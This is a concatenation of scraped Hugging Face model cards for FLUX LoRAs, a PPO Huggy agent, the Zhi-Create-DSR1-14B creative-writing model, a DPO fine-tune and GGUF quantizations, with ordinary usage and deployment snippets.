license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md
language:
- en
tags:
- flux
- diffusers
- lora
- replicate
base_model: "black-forest-labs/FLUX.1-dev"
pipeline_tag: text-to-image
# widget:
# - text: >-
# prompt
# output:
# url: https://...
instance_prompt: TOK
---
# A5A6Ef5B A9Da 48B7 8F14 392C5B16134F
<Gallery />
## About this LoRA
This is a [LoRA](https://replicate.com/docs/guides/working-with-loras) for the FLUX.1-dev text-to-image model. It can be used with diffusers or ComfyUI.
It was trained on [Replicate](https://replicate.com/) using AI toolkit: https://replicate.com/ostris/flux-dev-lora-trainer/train
## Trigger words
You should use `TOK` to trigger the image generation.
## Run this LoRA with an API using Replicate
```py
import replicate
input = {
"prompt": "TOK",
"lora_weights": "https://huggingface.co/tonnu/a5a6ef5b-a9da-48b7-8f14-392c5b16134f/resolve/main/lora.safetensors"
}
output = replicate.run(
"black-forest-labs/flux-dev-lora",
input=input
)
for index, item in enumerate(output):
with open(f"output_{index}.webp", "wb") as file:
file.write(item.read())
```
## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers)
```py
from diffusers import AutoPipelineForText2Image
import torch
pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda')
pipeline.load_lora_weights('tonnu/a5a6ef5b-a9da-48b7-8f14-392c5b16134f', weight_name='lora.safetensors')
image = pipeline('TOK').images[0]
```
For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters)
## Training details
- Steps: 1000
- Learning rate: 0.0004
- LoRA rank: 16
## Contribute your own examples
You can use the [community tab](https://huggingface.co/tonnu/a5a6ef5b-a9da-48b7-8f14-392c5b16134f/discussions) to add images that show off what you’ve made with this LoRA.
|
pratyushmathur/ppo-Huggy | pratyushmathur | 2025-05-30T07:00:16Z | 1 | 0 | ml-agents | [
"ml-agents",
"tensorboard",
"onnx",
"Huggy",
"deep-reinforcement-learning",
"reinforcement-learning",
"ML-Agents-Huggy",
"region:us"
] | reinforcement-learning | 2025-05-30T07:00:03Z | ---
library_name: ml-agents
tags:
- Huggy
- deep-reinforcement-learning
- reinforcement-learning
- ML-Agents-Huggy
---
# **ppo** Agent playing **Huggy**
This is a trained model of a **ppo** agent playing **Huggy**
using the [Unity ML-Agents Library](https://github.com/Unity-Technologies/ml-agents).
## Usage (with ML-Agents)
The Documentation: https://unity-technologies.github.io/ml-agents/ML-Agents-Toolkit-Documentation/
We wrote a complete tutorial to learn to train your first agent using ML-Agents and publish it to the Hub:
- A *short tutorial* where you teach Huggy the Dog 🐶 to fetch the stick and then play with him directly in your
browser: https://huggingface.co/learn/deep-rl-course/unitbonus1/introduction
- A *longer tutorial* to understand how works ML-Agents:
https://huggingface.co/learn/deep-rl-course/unit5/introduction
### Resume the training
```bash
mlagents-learn <your_configuration_file_path.yaml> --run-id=<run_id> --resume
```
### Watch your Agent play
You can watch your agent **playing directly in your browser**
1. If the environment is part of ML-Agents official environments, go to https://huggingface.co/unity
2. Step 1: Find your model_id: pratyushmathur/ppo-Huggy
3. Step 2: Select your *.nn /*.onnx file
4. Click on Watch the agent play 👀
|
Zhihu-ai/Zhi-Create-DSR1-14B-GPTQ-INT4 | Zhihu-ai | 2025-05-30T06:59:04Z | 78 | 12 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"conversational",
"zh",
"en",
"dataset:Congliu/Chinese-DeepSeek-R1-Distill-data-110k",
"dataset:cognitivecomputations/dolphin-r1",
"dataset:open-thoughts/OpenThoughts-114k",
"dataset:qihoo360/Light-R1-SFTData",
"dataset:qihoo360/Light-R1-DPOData",
"arxiv:2406.18629",
"arxiv:2402.13228",
"base_model:Zhihu-ai/Zhi-Create-DSR1-14B",
"base_model:quantized:Zhihu-ai/Zhi-Create-DSR1-14B",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"gptq",
"region:us"
] | text-generation | 2025-04-19T02:46:48Z | ---
license: apache-2.0
datasets:
- Congliu/Chinese-DeepSeek-R1-Distill-data-110k
- cognitivecomputations/dolphin-r1
- open-thoughts/OpenThoughts-114k
- qihoo360/Light-R1-SFTData
- qihoo360/Light-R1-DPOData
language:
- zh
- en
base_model:
- Zhihu-ai/Zhi-Create-DSR1-14B
tags:
- qwen2
library_name: transformers
---
# Zhi-Create-DSR1-14B
## 1. Introduction
Zhi-Create-DSR1-14B is a fine-tuned model based on DeepSeek-R1-Distill-Qwen-14B, specifically optimized for enhanced creative writing capabilities. Several benchmark evaluations indicate the model's improved creative writing performance.
In the [LLM Creative Story-Writing Benchmark](https://github.com/lechmazur/writing), the model achieved a score of **8.33** compared to its base model's **7.8**. In the [WritingBench](https://github.com/X-PLUG/WritingBench) evaluation framework, it scored **8.46**, showing improvement over DeepSeek-R1-Distill-Qwen-14B's **7.93**. The model was also evaluated using GPT-4o on the AlpacaEval dataset, achieving an **82.6%** win rate when compared with the base model.
The figure below shows the performance comparison across different domains in WritingBench:

<figcaption style="text-align:center; font-size:0.9em; color:#666">
Figure 1: WritingBench performance of Zhi-Create-DSR1-14B and DeepSeek-R1-Distill-Qwen-14B across 6 domains and 3 writing requirements evaluated with WritingBench critic model (scale: 1-10). The six domains include: (D1) Academic & Engineering, (D2) Finance & Business, (D3) Politics & Law, (D4) Literature & Art, (D5) Education, and (D6) Advertising & Marketing. The three writing requirements assessed are: (R1) Style, (R2) Format, and (R3) Length. Here, "C" indicates category-specific scores.
</figcaption>
## 2. Training Process
### Data
The model's training corpus comprises three primary data sources: rigorously filtered open-source datasets, chain-of-thought reasoning corpora, and curated question-answer pairs from Zhihu.
To achieve optimal domain coverage, we meticulously balanced the distribution of various datasets, including [Dolphin-r1](https://huggingface.co/datasets/cognitivecomputations/dolphin-r1), [Congliu/Chinese-DeepSeek-R1-Distill-data-110k](https://huggingface.co/datasets/Congliu/Chinese-DeepSeek-R1-Distill-data-110k), [OpenThoughts-114k](https://huggingface.co/datasets/open-thoughts/OpenThoughts-114k), [Light-R1-SFTData](https://huggingface.co/datasets/qihoo360/Light-R1-SFTData), and [Light-R1-DPOData](https://huggingface.co/datasets/qihoo360/Light-R1-DPOData), alongside high-quality content from Zhihu. All datasets underwent comprehensive quality assurance through our Reward Model (RM) filtering pipeline.
### Training
**Supervised Fine-tuning (SFT)**: We employed a curriculum learning strategy for supervised fine-tuning. This methodical approach systematically enhances creative writing capabilities while incorporating diverse domain data to maintain core competencies and mitigate catastrophic forgetting.
**Direct Preference Optimization (DPO)**: For scenarios involving minimal edit distances, we utilized Step-DPO ([arxiv:2406.18629](https://arxiv.org/abs/2406.18629)) to selectively penalize incorrect tokens, while incorporating positive constraints in the loss function as proposed in DPOP ([arXiv:2402.13228](https://arxiv.org/abs/2402.13228)).
## 3. Evaluation Results
Our evaluation results suggest promising improvements in the model's creative writing capabilities. In the LLM Creative Story-Writing Benchmark evaluation, the model achieved a score of **8.33**, showing an improvement from the base model's **7.87**. When assessed on WritingBench, a comprehensive framework for evaluating large language model writing abilities, the model attained a score of **8.46**. This places it in proximity to DeepSeek-R1's performance and represents an advancement over DeepSeek-R1-Distill-Qwen-14B's score of **7.93**.
With respect to general capabilities, evaluations indicate modest improvements of **2%–5% in knowledge and reasoning tasks (CMMLU, MMLU-Pro)**, alongside encouraging progress in mathematical reasoning as measured by benchmarks such as **AIME-2024, AIME-2025, and GSM8K**. The results suggest that the model maintains a balanced performance profile, with improvements observed across creative writing, knowledge/reasoning, and mathematical tasks compared to DeepSeek-R1-Distill-Qwen-14B. These characteristics potentially make it suitable for a range of general-purpose applications. We conducted additional evaluations on the instruction-following ifeval benchmark, with experimental results demonstrating a performance improvement in model capabilities from an initial score of **71.43** to an enhanced score of **74.71**.

<figcaption style="text-align:center; font-size:0.9em; color:#666">
Figure 2: When evaluating model performance, it is recommended to conduct multiple tests and average the results. (We use n=16 and max_tokens=32768 for mathematical tasks and n=2 for others)
</figcaption>
## 4. How to Run Locally
Zhi-Create-DSR1-14B can be deployed on various hardware configurations, including GPUs with 80GB memory, a single H20/A800/H800, or dual RTX 4090. Additionally, the INT4 quantized version Zhi-Create-DSR1-14B-GPTQ-INT4 can be deployed on a single RTX 4090.
### Transformers
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
from transformers.generation import GenerationConfig
MODEL_NAME = "Zhihu-ai/Zhi-Create-DSR1-14B"
tokenizer = AutoTokenizer.from_pretrained(MODEL_NAME, trust_remote_code=True)
# use bf16
# model = AutoModelForCausalLM.from_pretrained(MODEL_NAME, device_map="auto", trust_remote_code=True, bf16=True).eval()
# use fp16
# model = AutoModelForCausalLM.from_pretrained(MODEL_NAME, device_map="auto", trust_remote_code=True, fp16=True).eval()
# use cpu only
# model = AutoModelForCausalLM.from_pretrained(MODEL_NAME, device_map="cpu", trust_remote_code=True).eval()
# use auto mode, automatically select precision based on the device.
model = AutoModelForCausalLM.from_pretrained(
MODEL_NAME,
device_map="auto",
trust_remote_code=True
).eval()
# Specify hyperparameters for generation. But if you use transformers>=4.32.0, there is no need to do this.
# model.generation_config = GenerationConfig.from_pretrained(MODEL_NAME, trust_remote_code=True)
generate_configs = {
"temperature": 0.6,
"do_sample": True,
"top_p": 0.95,
"max_new_tokens": 4096
}
prompt = "请你以鲁迅的口吻,写一篇介绍西湖醋鱼的文章"
messages = [
{"role": "user", "content": prompt}
]
text = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
model_inputs = tokenizer([text], return_tensors="pt").to(model.device)
generated_ids = model.generate(
**model_inputs,
**generate_configs
)
generated_ids = [
output_ids[len(input_ids):] for input_ids, output_ids in zip(model_inputs.input_ids, generated_ids)
]
response = tokenizer.batch_decode(generated_ids, skip_special_tokens=True)[0]
print(response)
```
### ZhiLight
You can easily start a service using [ZhiLight](https://github.com/zhihu/ZhiLight)
```bash
docker run -it --net=host --gpus='"device=0"' -v /path/to/model:/mnt/models --entrypoints="" ghcr.io/zhihu/zhilight/zhilight:0.4.17-cu124 python -m zhilight.server.openai.entrypoints.api_server --model-path /mnt/models --port 8000 --enable-reasoning --reasoning-parser deepseek-r1 --served-model-name Zhi-Create-DSR1-14B
curl http://localhost:8000/v1/completions \
-H "Content-Type: application/json" \
-d '{
"model": "Zhi-Create-DSR1-14B",
"prompt": "请你以鲁迅的口吻,写一篇介绍西湖醋鱼的文章",
"max_tokens": 4096,
"temperature": 0.6,
"top_p": 0.95
}'
```
### vllm
For instance, you can easily start a service using [vLLM](https://github.com/vllm-project/vllm)
```bash
# install vllm
pip install vllm>=0.6.4.post1
# huggingface model id
vllm serve Zhihu-ai/Zhi-Create-DSR1-14B --served-model-name Zhi-Create-DSR1-14B --port 8000
# local path
vllm serve /path/to/model --served-model-name Zhi-Create-DSR1-14B --port 8000
curl http://localhost:8000/v1/completions \
-H "Content-Type: application/json" \
-d '{
"model": "Zhi-Create-DSR1-14B",
"prompt": "请你以鲁迅的口吻,写一篇介绍西湖醋鱼的文章",
"max_tokens": 4096,
"temperature": 0.6,
"top_p": 0.95
}'
```
### SGLang
You can also easily start a service using [SGLang](https://github.com/sgl-project/sglang)
```bash
# install SGLang
pip install "sglang[all]>=0.4.5" --find-links https://flashinfer.ai/whl/cu124/torch2.5/flashinfer-python
# huggingface model id
python -m sglang.launch_server --model-path Zhihu-ai/Zhi-Create-DSR1-14B --served-model-name Zhi-Create-DSR1-14B --port 8000
# local path
python -m sglang.launch_server --model-path /path/to/model --served-model-name Zhi-Create-DSR1-14B --port 8000
# send request
curl http://localhost:8000/v1/completions \
-H "Content-Type: application/json" \
-d '{
"model": "Zhi-Create-DSR1-14B",
"prompt": "请你以鲁迅的口吻,写一篇介绍西湖醋鱼的文章",
"max_tokens": 4096,
"temperature": 0.6,
"top_p": 0.95
}'
```
### ollama
You can download ollama using [this](https://ollama.com/download/)
* quantization: Q4_K_M
```bash
ollama run zhihu/zhi-create-dsr1-14b
```
* bf16
```bash
ollama run zhihu/zhi-create-dsr1-14b:bf16
```
## 5. Usage Recommendations
We recommend adhering to the following configurations when utilizing the Zhi-Create-DSR1-14B, including benchmarking, to achieve the expected performance:
* Set the temperature within the range of 0.5-0.7 (0.6 is recommended) to prevent endless repetitions or incoherent outputs.
* When evaluating model performance, it is recommended to conduct multiple tests and average the results. (We use `n=16` and `max_tokens=32768` for mathematical tasks and `n=2` for others)
* To ensure that the model engages in thorough reasoning like DeepSeek-R1 series models, we recommend enforcing the model to initiate its response with "\<think\>\n" at the beginning of every output.
## 6. Citation
```text
@misc{Zhi-Create-DSR1-14B,
title={Zhi-Create-DSR1-14B: Curriculum Reinforcement and Direct Preference Optimization for Robust Creative Writing in LLMs},
author={Jiewu Wang, Xu Chen, Wenyuan Su, Chao Huang, Hongkui Gao, Lin Feng, Shan Wang, Lu Xu, Penghe Liu, Zebin Ou},
year={2025},
eprint={},
archivePrefix={},
url={https://huggingface.co/Zhihu-ai/Zhi-Create-DSR1-14B},
}
```
## 7. Contact
If you have any questions, please raise an issue or contact us at [[email protected]](mailto:[email protected]). |
liam-mnlp/second-mcqa-model | liam-mnlp | 2025-05-30T06:46:18Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"generated_from_trainer",
"conversational",
"base_model:liam-mnlp/MNLP_M2_mcqa_model",
"base_model:finetune:liam-mnlp/MNLP_M2_mcqa_model",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-05-29T21:17:52Z | ---
library_name: transformers
base_model: liam-mnlp/MNLP_M2_mcqa_model
tags:
- generated_from_trainer
model-index:
- name: first-mcqa-model
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# first-mcqa-model
This model is a fine-tuned version of [liam-mnlp/MNLP_M2_mcqa_model](https://huggingface.co/liam-mnlp/MNLP_M2_mcqa_model) on an unknown dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 2
### Training results
### Framework versions
- Transformers 4.51.3
- Pytorch 2.7.0+cu126
- Datasets 3.6.0
- Tokenizers 0.21.0
|
BootesVoid/cmbae48860p391b1y532qmfid_cmbae9tjy001ahy17i2n06jj8 | BootesVoid | 2025-05-30T06:45:19Z | 0 | 0 | diffusers | [
"diffusers",
"flux",
"lora",
"replicate",
"text-to-image",
"en",
"base_model:black-forest-labs/FLUX.1-dev",
"base_model:adapter:black-forest-labs/FLUX.1-dev",
"license:other",
"region:us"
] | text-to-image | 2025-05-30T06:45:18Z | ---
license: other
license_name: flux-1-dev-non-commercial-license
license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md
language:
- en
tags:
- flux
- diffusers
- lora
- replicate
base_model: "black-forest-labs/FLUX.1-dev"
pipeline_tag: text-to-image
# widget:
# - text: >-
# prompt
# output:
# url: https://...
instance_prompt: kélyah_
---
# Cmbae48860P391B1Y532Qmfid_Cmbae9Tjy001Ahy17I2N06Jj8
<Gallery />
## About this LoRA
This is a [LoRA](https://replicate.com/docs/guides/working-with-loras) for the FLUX.1-dev text-to-image model. It can be used with diffusers or ComfyUI.
It was trained on [Replicate](https://replicate.com/) using AI toolkit: https://replicate.com/ostris/flux-dev-lora-trainer/train
## Trigger words
You should use `kélyah_` to trigger the image generation.
## Run this LoRA with an API using Replicate
```py
import replicate
input = {
"prompt": "kélyah_",
"lora_weights": "https://huggingface.co/BootesVoid/cmbae48860p391b1y532qmfid_cmbae9tjy001ahy17i2n06jj8/resolve/main/lora.safetensors"
}
output = replicate.run(
"black-forest-labs/flux-dev-lora",
input=input
)
for index, item in enumerate(output):
with open(f"output_{index}.webp", "wb") as file:
file.write(item.read())
```
## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers)
```py
from diffusers import AutoPipelineForText2Image
import torch
pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda')
pipeline.load_lora_weights('BootesVoid/cmbae48860p391b1y532qmfid_cmbae9tjy001ahy17i2n06jj8', weight_name='lora.safetensors')
image = pipeline('kélyah_').images[0]
```
For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters)
## Training details
- Steps: 2000
- Learning rate: 0.0004
- LoRA rank: 16
## Contribute your own examples
You can use the [community tab](https://huggingface.co/BootesVoid/cmbae48860p391b1y532qmfid_cmbae9tjy001ahy17i2n06jj8/discussions) to add images that show off what you’ve made with this LoRA.
|
AmberYifan/Llama-3.1-8B-sft-SPIN-gpt4o-beta0.5-lr1e-7 | AmberYifan | 2025-05-30T06:41:42Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"generated_from_trainer",
"trl",
"dpo",
"conversational",
"arxiv:2305.18290",
"base_model:AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF",
"base_model:finetune:AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-05-30T06:20:37Z | ---
base_model: AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF
library_name: transformers
model_name: Llama-3.1-8B-sft-SPIN-gpt4o-beta0.5-lr1e-7
tags:
- generated_from_trainer
- trl
- dpo
licence: license
---
# Model Card for Llama-3.1-8B-sft-SPIN-gpt4o-beta0.5-lr1e-7
This model is a fine-tuned version of [AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF](https://huggingface.co/AmberYifan/Llama-3.1-8B-sft-ultrachat-safeRLHF).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="AmberYifan/Llama-3.1-8B-sft-SPIN-gpt4o-beta0.5-lr1e-7", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/yifanwang/huggingface/runs/hbsctnfy)
This model was trained with DPO, a method introduced in [Direct Preference Optimization: Your Language Model is Secretly a Reward Model](https://huggingface.co/papers/2305.18290).
### Framework versions
- TRL: 0.12.2
- Transformers: 4.46.3
- Pytorch: 2.7.0
- Datasets: 3.6.0
- Tokenizers: 0.20.3
## Citations
Cite DPO as:
```bibtex
@inproceedings{rafailov2023direct,
title = {{Direct Preference Optimization: Your Language Model is Secretly a Reward Model}},
author = {Rafael Rafailov and Archit Sharma and Eric Mitchell and Christopher D. Manning and Stefano Ermon and Chelsea Finn},
year = 2023,
booktitle = {Advances in Neural Information Processing Systems 36: Annual Conference on Neural Information Processing Systems 2023, NeurIPS 2023, New Orleans, LA, USA, December 10 - 16, 2023},
url = {http://papers.nips.cc/paper_files/paper/2023/hash/a85b405ed65c6477a4fe8302b5e06ce7-Abstract-Conference.html},
editor = {Alice Oh and Tristan Naumann and Amir Globerson and Kate Saenko and Moritz Hardt and Sergey Levine},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
``` |
vishaldekate21/llamaFineTune | vishaldekate21 | 2025-05-30T06:38:19Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-05-30T06:37:58Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
mradermacher/DS-Qwen-7b-GG-CalibratedConfRL-GGUF | mradermacher | 2025-05-30T06:29:28Z | 166 | 0 | transformers | [
"transformers",
"gguf",
"en",
"base_model:AmirhoseinGH/DS-Qwen-7b-GG-CalibratedConfRL",
"base_model:quantized:AmirhoseinGH/DS-Qwen-7b-GG-CalibratedConfRL",
"license:apache-2.0",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2025-05-24T20:56:21Z | ---
base_model: AmirhoseinGH/DS-Qwen-7b-GG-CalibratedConfRL
language:
- en
library_name: transformers
license: apache-2.0
quantized_by: mradermacher
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/AmirhoseinGH/DS-Qwen-7b-GG-CalibratedConfRL
<!-- provided-files -->
weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/DS-Qwen-7b-GG-CalibratedConfRL-GGUF/resolve/main/DS-Qwen-7b-GG-CalibratedConfRL.Q2_K.gguf) | Q2_K | 3.1 | |
| [GGUF](https://huggingface.co/mradermacher/DS-Qwen-7b-GG-CalibratedConfRL-GGUF/resolve/main/DS-Qwen-7b-GG-CalibratedConfRL.Q3_K_S.gguf) | Q3_K_S | 3.6 | |
| [GGUF](https://huggingface.co/mradermacher/DS-Qwen-7b-GG-CalibratedConfRL-GGUF/resolve/main/DS-Qwen-7b-GG-CalibratedConfRL.Q3_K_M.gguf) | Q3_K_M | 3.9 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/DS-Qwen-7b-GG-CalibratedConfRL-GGUF/resolve/main/DS-Qwen-7b-GG-CalibratedConfRL.Q3_K_L.gguf) | Q3_K_L | 4.2 | |
| [GGUF](https://huggingface.co/mradermacher/DS-Qwen-7b-GG-CalibratedConfRL-GGUF/resolve/main/DS-Qwen-7b-GG-CalibratedConfRL.IQ4_XS.gguf) | IQ4_XS | 4.4 | |
| [GGUF](https://huggingface.co/mradermacher/DS-Qwen-7b-GG-CalibratedConfRL-GGUF/resolve/main/DS-Qwen-7b-GG-CalibratedConfRL.Q4_K_S.gguf) | Q4_K_S | 4.6 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/DS-Qwen-7b-GG-CalibratedConfRL-GGUF/resolve/main/DS-Qwen-7b-GG-CalibratedConfRL.Q4_K_M.gguf) | Q4_K_M | 4.8 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/DS-Qwen-7b-GG-CalibratedConfRL-GGUF/resolve/main/DS-Qwen-7b-GG-CalibratedConfRL.Q5_K_S.gguf) | Q5_K_S | 5.4 | |
| [GGUF](https://huggingface.co/mradermacher/DS-Qwen-7b-GG-CalibratedConfRL-GGUF/resolve/main/DS-Qwen-7b-GG-CalibratedConfRL.Q5_K_M.gguf) | Q5_K_M | 5.5 | |
| [GGUF](https://huggingface.co/mradermacher/DS-Qwen-7b-GG-CalibratedConfRL-GGUF/resolve/main/DS-Qwen-7b-GG-CalibratedConfRL.Q6_K.gguf) | Q6_K | 6.4 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/DS-Qwen-7b-GG-CalibratedConfRL-GGUF/resolve/main/DS-Qwen-7b-GG-CalibratedConfRL.Q8_0.gguf) | Q8_0 | 8.2 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/DS-Qwen-7b-GG-CalibratedConfRL-GGUF/resolve/main/DS-Qwen-7b-GG-CalibratedConfRL.f16.gguf) | f16 | 15.3 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
josegmloyo/miky | josegmloyo | 2025-05-30T06:27:43Z | 0 | 0 | null | [
"license:other",
"region:us"
] | null | 2025-05-30T05:48:35Z | ---
license: other
license_name: flux-1-dev-non-commercial-license
license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md
--- |
Subsets and Splits